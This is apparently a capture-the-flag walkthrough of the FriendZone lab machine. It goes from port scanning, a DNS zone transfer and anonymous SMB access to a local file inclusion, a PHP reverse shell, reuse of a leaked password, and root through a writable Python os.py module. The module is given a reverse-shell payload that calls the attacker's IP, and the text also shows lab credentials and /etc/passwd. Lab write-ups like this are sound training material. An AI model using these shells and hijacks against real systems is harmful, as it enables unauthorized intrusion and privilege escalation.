FriendZone
Reconnaissance: NMAP
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.123
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.18 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 4.10 (93%), Linux 4.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: -1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2024-01-08T04:58:12+02:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-01-08T02:58:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.15 seconds┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.123
53/udp open domain
113/udp open|filtered auth
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
21847/udp open|filtered netspeak-cs
36669/udp open|filtered unknown┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.123┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 01:24 EST
Nmap scan report for friendzoneportal.red (10.10.10.123)
Host is up (0.47s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none> HTTP Port 80/tcp
I always start off with enumerating HTTP first. In this case both 80 and 443 are open so we’ll start there. We can see the email is info@friendzoneportal.red. The friendzoneportal.red could be a possible domain name. We’ll keep it in mind when enumerating DNS.
http://10.10.10.123/ info@friendzoneportal.red
View the source code to see if we can find any other information. view-source:http://10.10.10.123/
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.123 friendzoneportal.redGobuster:
┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt
/.php (Status: 403) [Size: 291]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.10.123/wordpress/]
/robots.txt (Status: 200) [Size: 13]
/.php (Status: 403) [Size: 291]Nikto:
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.123/
- Nikto v2.5.0
+ Target IP: 10.10.10.123
+ Target Hostname: 10.10.10.123
+ Target Port: 80
+ Start Time: 2024-01-07 22:11:15 (GMT-5)
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 144, size: 577831e9005e6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/: Directory indexing found.
+ 8048 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2024-01-07 23:13:07 (GMT-5) (3712 seconds) Enumeration: HTTPS Port 443/tcp
Visiting the site over HTTPS (port 443) gives us an error.
https://10.10.10.123/
Not Found
The requested URL / was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 10.10.10.123 Port 443Therefore, let’s move on to enumerating DNS.
gobuster -k -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20 -x txt,php
/admin (Status: 301)
/js (Status: 301)/admin is an empty dir just like /wordpress was on http:
/js has something in it:
Going to https://friendzone.red/js/js/ gives a page:
https://friendzone.red/js/js/
Testing some functions !
I'am trying not to break things !
Z2pPVHFINUs4cTE3MDQ2OTUyMzNtejFyWVlBNUhTThe source reveals it also has some comments:
<p>Testing some functions !</p><p>I'am trying not to break things !</p>
S0s4ZGFJdjFibDE1NDk5MjIwMDJIbWt2TmtKZThr<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->This doesn’t have much meaning to me yet. Might be an allusion to DNS zones. Or it might just be a troll.
Enumeration: ISC BIND Port 53/tcp
Try to get a domain name for the IP address using nslookup. 9.11.3–1ubuntu1.2 (DNS)
┌──(kali💀kali)-[~]
└─$ nslookup
> server 10.10.10.123
Default server: 10.10.10.123
Address: 10.10.10.123#53We don’t get anything. However, we do have two possible domains from previous enumeration steps:
friendzone.red from the nmap scan, and
friendzoneportal.red from the HTTP website
Let’s try a zone transfer on both domains.
zone transfer command: host -l <dns_server-address>
┌──(kali💀kali)-[~]
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1┌──(kali💀kali)-[~]
└─$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1Add all the domains/subdomains in the /hosts/etc file.
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.123 friendzoneportal.red
10.10.10.123 friendzone.red
10.10.10.123 friendzoneportal.red
10.10.10.123 admin.friendzoneportal.red
10.10.10.123 files.friendzoneportal.red
10.10.10.123 imports.friendzoneportal.red
10.10.10.123 vpn.friendzoneportal.red
10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.redNow we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.
The following sites showed us particularly interesting results.
https://admin.friendzoneportal.red/
https://administrator1.friendzone.red/
https://uploads.friendzone.red/I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.
Enumeration: Ports 139 / Port 445/tcp: Samba smbd 4.7.6-Ubuntu
Run smbmap to list available shares and permissions.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123 -r
[+] IP: 10.10.10.123:445 Name: friendzoneportal.red Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
./general
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
./Development
dr--r--r-- 0 Mon Jan 8 00:58:36 2024 .
dr--r--r-- 0 Tue Sep 13 10:56:24 2022 ..
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))-R: Recursively list directories and files on all accessible shares
smbclient -N //10.10.10.123/Development┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.
┌──(kali💀kali)-[~]
└─$ smbclient -L //10.10.10.123
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE-L: look at what services are available on a server
The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.
Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.
┌──(kali💀kali)-[~]
└─$ smbclient //10.10.10.123/general -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Tue Sep 13 10:56:24 2022
creds.txt N 57 Tue Oct 9 19:52:42 2018-N: suppresses the normal password prompt from the client to the user
Download the creds.txt file from the target machine to the attack machine.
smb: \> get creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
creds for the admin THING:admin:WORKWORKHhallelujah@#https://admin.friendzoneportal.red/
https://admin.friendzoneportal.red/login.php
Admin page is not developed yet !!! check for another oneAlso doesn’t work. Next, try the credentials on the
https://administrator1.friendzone.red/We’re in! Visit the /dashboard.php page.
https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestampIt seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.
The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.
?image_id=a.jpg&pagename=timestamphttps://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestampFinal Access timestamp is 1704698027
Let’s put that timestamp number in the pagename URL parameter. After we do that we no longer get a “Final Access timestamp…” message.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=1704698027During our enumeration phase, we found a URL, that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.
https://uploads.friendzone.red/https://uploads.friendzone.red/upload.php
Uploaded successfully !
1704698226When we successfully upload the image random.jpg we get a timestamp. Let’s use the image and timestamp on the dashboard page.
https://administrator1.friendzone.red/dashboard.php?image_id=random.jpg&pagename=1704698226┌──(kali💀kali)-[~/Desktop]
└─$ gobuster dir -k -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
/.php (Status: 403) [Size: 309]
/images (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]
/login.php (Status: 200) [Size: 7]
/dashboard.php (Status: 200) [Size: 101] Enumeration: FTP Port 21/tcp
vsftpd 3.0.3
Try the credentials on FTP.
┌──(kali💀kali)-[~]
└─$ ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:kali): WORKWORKHhallelujah@#Doesn’t work. Next, try SSH.
Enumeration: SSH Port 22/tcp
OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
┌──(kali💀kali)-[~]
└─$ ssh admin@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
admin@10.10.10.123's password:
Permission denied, please try again.Also doesn’t work.
Shell as www.data
LFI Based on the recon above, there’s a likely local file include (LFI) in this page. Both parameters have potential.
Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application is currently working, my gut feeling is that it takes the filename “timestamp” and appends “.php” to it and then runs that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose sensitive files since the “.php” extension will get added to my query.
Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).
┌──(kali💀kali)-[~/Desktop]
└─$ curl -k https://administrator1.friendzone.red/timestamp.php
Final Access timestamp is 1704699293 Let’s create a simple test.php script that outputs the string “It’s working!” on the page.
<?php
echo "It's working!";
?>Log into the Development share.
┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.123/Development -N
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (3.3 kb/s) (average 3.3 kb/s)┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.123] 39144
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
08:47:00 up 3:50, 0 users, load average: 0.02, 0.06, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
bind:x:109:116::/var/cache/bind:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
friend:x:1000:1000:friend,,,:/home/friend:/bin/bashLet’s upgrade it to a better shell.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$ This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.
www-data@FriendZone:/$ cat home/friend/user.txt
cat home/friend/user.txt
69559f0496405776adaf3d141aa188bb Priv: www-data to friend
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
friend:x:1000:1000:friend,,,:/home/friend:/bin/bashIn the /var/www/ directory, there’s folders for all the different sites, as well as an sql conf file:
www-data@FriendZone:/etc/Development$ cd /var/www/
www-data@FriendZone:/var/www$ ls
ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZThose creds happen to work for friend. I can either su friend:
SU:
www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/var/www$ whoami
friend
friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)SSH:
or ssh in with them:
┌──(kali💀kali)-[~]
└─$ ssh friend@10.10.10.123
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
friend@FriendZone:~$ ls
user.txt
friend@FriendZone:~$ cat user.txt
69559-----------------------------┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555www-data@FriendZone:/tmp$ cd /etc/Development/We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script in the Development share.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ smbclient //10.10.10.123/Development -N
Try "help" to get a list of possible commands.
smb: \> put LinEnum.shGive the script execute permissions.
chmod +x LinEnum.shI don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.
Navigate to the /tmp directory and try again.
cd /tmp/
chmod +x LinEnum.shThat works, so the next step is to execute the script.
./LinEnum.shThe results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.
Upload it and run it on the attack machine in the same way we did for LinEnum.
Priv: friend to root
It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.
ls -la /opt/server_admin/friend@FriendZone:~$ ls -la /opt/server_admin/
total 12
drwxr-xr-x 2 root root 4096 Sep 13 2022 .
drwxr-xr-x 3 root root 4096 Sep 13 2022 ..
-rwxr--r-- 1 root root 424 Jan 16 2019 reporter.pyWe only have read permission. So let’s view the content of the file.
friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developerHere’s the soure code of the script. Most of the script is commented out so there isn’t much to do there. It does import the os module. Maybe we can hijack that. Locate the module on the machine.
friend@FriendZone:~$ locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.pyNavigate to the directory and view the permissions on the file
friend@FriendZone:~$ cd /usr/lib/python2.7
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 os.py
-rw-rw-r-- 1 friend friend 25583 Jan 15 2019 os.pycWe have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!
I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec). Go to a new pane in the attack machine and enter the following command.
friend@FriendZone:/usr/lib/python2.7$ stty -a
speed 38400 baud; rows 51; columns 97; line = 0;
intr = ^C; quit = ^\; erase = ^H; kill = ^U; eof = ^D; eol = M-^?; eol2 = M-^?; swtch = <undef>;
start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O;
min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl -ixon -ixoff -iuclc -ixany
-imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho
-extprocfriend@FriendZone:/usr/lib/python2.7$ stty rows 29 columns 113Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine. Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0);
dup2(s.fileno(),1);
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);Setup a listener on the attack machine.
┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ nc -lnvp 1234 Wait for the scheduled task to run the reporter.py script that will in turn call the os.py module which contains our reverse shell code.
friend@FriendZone:/usr/lib/python2.7$ cat os.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));
dup2(s.fileno(),0);
dup2(s.fileno(),1);
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);We get back a shell running with root privileges! Grab the root.txt flag.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
612f35-----------------------------Last updated